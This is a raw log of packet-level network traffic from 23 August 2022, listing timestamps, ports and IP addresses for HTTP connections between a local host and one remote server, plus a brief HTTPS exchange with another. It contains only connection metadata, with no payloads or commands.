Aug 23, 2022 18:23:57.931514025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931514978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931529999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931530952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931545973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931560993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931574106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931575060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931603909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931608915 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931623936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931643963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931658030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931701899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931752920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931766033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931794882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931811094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931824923 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931862116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931911945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931930065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931941986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.931951046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931971073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931988001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.931988001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932005882 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932027102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932039976 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932044029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932056904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932084084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932112932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932281017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932305098 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932322025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932326078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932353973 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.932358027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932359934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932367086 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.932396889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932432890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932462931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932471991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932499886 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932512045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932523966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932605028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932631016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932631969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932650089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932707071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932728052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932751894 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932811022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.932852030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.932893038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933126926 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933168888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933172941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933212996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933221102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933233976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933249950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933285952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933305025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933346033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933362007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933403015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933413029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933419943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933464050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933551073 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933610916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933631897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933653116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933665991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933681965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933711052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933722019 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933804035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933823109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933859110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933873892 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933876038 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933887959 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.933912992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.933929920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.934279919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.934324026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.934341908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.934360027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.934385061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.934425116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.934444904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.934473991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.936381102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.936451912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.937912941 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.937982082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.940372944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.940462112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.942497015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.943092108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.948798895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.948838949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.948894978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.948930979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.950752020 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.950841904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.950896978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.950917006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.950936079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.950954914 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.950956106 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.950988054 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951021910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951118946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951139927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951159954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951178074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951179981 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951219082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951246023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951317072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951359034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951390982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951433897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951450109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951493979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951538086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951725006 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951792002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951802015 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951822996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951860905 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951885939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.951916933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.951996088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.952241898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.952263117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.952299118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.952318907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.952367067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.952459097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.954487085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.954507113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.954524040 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.954541922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.954586983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.954617023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.956130028 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.956147909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.956165075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.956177950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.956226110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.956248045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958229065 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958375931 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958394051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958410025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958426952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958444118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958445072 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958462000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958475113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958478928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.958545923 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958817005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.958827972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.960967064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.962471008 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.962575912 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:57.962593079 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.962650061 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.989012957 CEST	49835	443	192.168.2.3	148.251.234.83
Aug 23, 2022 18:23:57.989047050 CEST	443	49835	148.251.234.83	192.168.2.3
Aug 23, 2022 18:23:58.683955908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.720159054 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811466932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811506987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811527967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811544895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811585903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811624050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.811640978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811666965 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811683893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811690092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.811712027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.811744928 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.811764002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811790943 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811819077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811836004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.811851978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.811888933 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.843873978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.843939066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.843976021 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.844050884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.844105959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849361897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849411011 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849450111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849486113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849575996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849625111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849631071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849683046 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849719048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849756002 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849760056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849775076 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849797964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849843025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849849939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849858999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849893093 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849931002 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849951029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.849971056 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.849993944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850012064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850029945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850049973 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850090027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850101948 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850130081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850145102 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850167990 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850186110 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850203991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.850234985 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.850274086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880387068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880439043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880525112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880532026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880568027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880601883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880603075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880621910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880640030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880671024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880698919 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880716085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880748034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880779982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880805016 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.880815983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880850077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.880908966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.884051085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.884226084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894033909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894062996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894079924 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894092083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894215107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894275904 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894414902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894433975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894450903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894467115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894480944 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894484997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894500017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894515991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894543886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894547939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894582033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894592047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894620895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894638062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894644022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894675970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894685030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894716024 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894721031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894732952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894762039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894764900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894778967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894793987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894794941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894821882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894853115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894862890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894905090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894912004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894941092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894954920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.894985914 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.894999027 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895001888 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895030022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895030975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895057917 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895081997 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895129919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895148039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895164967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895183086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895191908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895224094 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895239115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895241022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895256996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.895267010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.895314932 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.911955118 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.912657022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.912695885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.912715912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.912731886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.912744999 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.912763119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.912785053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.913028955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.913079977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.914484978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914504051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914520979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914539099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914550066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.914587021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.914697886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914730072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:58.914745092 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:58.915018082 CEST	80	49827	45.95.11.158	192.168.2.3
